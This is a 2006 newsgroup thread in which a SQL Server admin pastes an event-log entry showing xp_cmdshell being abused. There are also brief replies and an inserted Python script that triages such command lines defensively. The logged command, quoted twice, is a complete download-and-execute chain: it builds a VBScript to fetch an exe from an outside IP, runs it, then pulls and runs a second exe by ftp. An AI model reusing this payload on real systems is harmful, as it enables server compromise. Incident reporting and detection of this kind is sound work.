machine slow performance
| bass_ua 2006-12-13, 7:12 pm |
| I have discovered recently that the sql server 2000 sp4 has spawned a lot of
cmd.exe processes.
Event viewer is full of events like:
8128 :
Using 'xplog70.dll' version '2000.80.760' to execute extended stored
procedure 'xp_cmdshell'.
the parameter cmd.exe was called:
C:\WINDOWS\system32\cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.
vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
vbs&echo ExeURL = "http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&echo
LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET =
CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data =
CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo
HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.
adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type =
adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_mssql.
exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
Now I'm out of my mind how to stop this.
Can anyone help me?
| |
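Added example, not part of the original thread or written by any poster: Python triage for xp_cmdshell command lines like the one logged above. It splits the line into cmd.exe stages and flags any stage that runs a file written earlier in the same line; the sample lines, tag names and the 192.0.2.10 address are constructed for illustration.

```python
import re

# Constructed, shortened command lines in the shape of the logged one;
# 192.0.2.10 is a documentation address, not data from the thread.
SAMPLES = [
    r'cmd.exe /c echo ExeURL = "http://192.0.2.10:8080/a.exe">c:\1.vbs'
    r'&echo Set H = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs'
    r'&cscript //Nologo /B c:\1.vbs&del c:\1.vbs&start c:\msagent.exe'
    r'&echo open 192.0.2.10 2121>x&echo get b.exe>>x&ftp -n -s:x&b.exe&del x&exit',
    r'cmd.exe /c dir c:\backup\*.bak',
]
REDIR = re.compile(r'^echo\b.*>{1,2}\s*(\S+)$', re.I)  # echo ... > file

def split_stages(cmdline):
    """Split on '&' as cmd.exe does: not when ^-escaped or inside quotes."""
    parts = re.findall(r'(?:\^.|"[^"]*"|[^&^])+', cmdline)
    return [p.strip() for p in parts if p.strip()]

def triage(cmdline):
    """Tag stages that run or delete a file the same command line wrote."""
    written, tags = set(), set()
    body = re.sub(r'^\S*cmd(?:\.exe)?\s+/c\s+', '', cmdline, flags=re.I)
    for stage in split_stages(body):
        m = REDIR.match(stage)
        if m:
            written.add(m.group(1).lower())
            continue
        args = stage.lower().split()
        refs = {a[3:] if a.startswith('-s:') else a for a in args[1:]} & written
        if refs and args[0] in ('del', 'erase'):
            tags.add('deletes-staged-file')
        elif refs:
            tags.add('runs-staged-file:' + args[0])
        elif args[0] == 'start' or args[0].endswith('.exe'):
            tags.add('launches-exe')
    return {'urls': re.findall(r'https?://[^\s"\'>]+', cmdline, re.I),
            'staged': sorted(written), 'tags': sorted(tags),
            'suspicious': any(t.startswith('runs-staged') for t in tags)}

if __name__ == '__main__':
    for s in SAMPLES:
        print(triage(s))
```

The 'staged' and 'urls' fields give the file paths and hosts to look for on disk and in firewall or proxy logs while the caller is being traced.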
| Tibor Karaszi 2006-12-13, 7:12 pm |
| SQL Server does not do this by itself. It is either a job or some application that does this. I
suggest you use Profiler to track down who is calling these xp_cmdshell executions.
--
Tibor Karaszi, SQL Server MVP
http://www.karaszi.com/sqlserver/default.asp
http://www.solidqualitylearning.com/
"bass_ua" <u30195@uwe> wrote in message news:6ab4e8b03613c@uwe...
>I have discovered recently that the sql server 2000 sp4 has spawned a lot of
> cmd.exe processes.
> Event viewer is full of events like:
> 8128 :
> Using 'xplog70.dll' version '2000.80.760' to execute extended stored
> procedure 'xp_cmdshell'.
>
> the parameter cmd.exe was called:
> C:\WINDOWS\system32\cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.
> vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
> vbs&echo ExeURL = "http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&echo
> LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET =
> CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data =
> CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo
> HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.
> adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type =
> adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
> ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
> adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
> vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_mssql.
> exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
>
> Now I'm out of my mind how to stop this.
> Can anyone help me?
>
| |
| Steve Dassin 2006-12-13, 7:12 pm |
| "Tibor Karaszi" <tibor_please.no.email_karaszi@hotmail.nomail.com> wrote in
message news:OtyZQntHHHA.2632@TK2MSFTNGP06.phx.gbl...
> SQL Server does not do this by itself. It is either a job or some
> application that does this. I suggest you use Profiler to track down who
> is calling these xp_cmdshell executions.
'TRACK DOWN' ...is this a police action??
Ok, Rac uses xp_cmdshell and regularly. What do you want to do about it! ?
You wanna come and get me? You gonna bring the MVP brigade? Armed?
Well I'll be waiting for ya. I'm not frightened by the shell game.
-:)
best wishes for the holidays,
steve
| |
| Tibor Karaszi 2006-12-13, 7:12 pm |
| LOL
Bring it on, Steve. ;-)
> Ok, Rac uses xp_cmdshell and regularly.
Ahh, I didn't know that. You think this one was RAC? I tend to be suspicious when I see a lot of
xp_cmdshell calls, but that is not the same as saying that there aren't good/smart/valid reasons to
use it.
> best wishes for the holidays,
And the same to you! :-)
--
Tibor Karaszi, SQL Server MVP
http://www.karaszi.com/sqlserver/default.asp
http://www.solidqualitylearning.com/
"Steve Dassin" <steve@nospamrac4sql.net> wrote in message
news:uK8aDjwHHHA.1264@TK2MSFTNGP06.phx.gbl...
> "Tibor Karaszi" <tibor_please.no.email_karaszi@hotmail.nomail.com> wrote in message
> news:OtyZQntHHHA.2632@TK2MSFTNGP06.phx.gbl...
>
> 'TRACK DOWN' ...is this a police action??
> Ok, Rac uses xp_cmdshell and regularly. What do you want to do about it! ?
> You wanna come and get me? You gonna bring the MVP brigade? Armed?
> Well I'll be waiting for ya. I'm not frightened by the shell game.
>
>
>
> -:)
>
> best wishes for the holidays,
> steve
>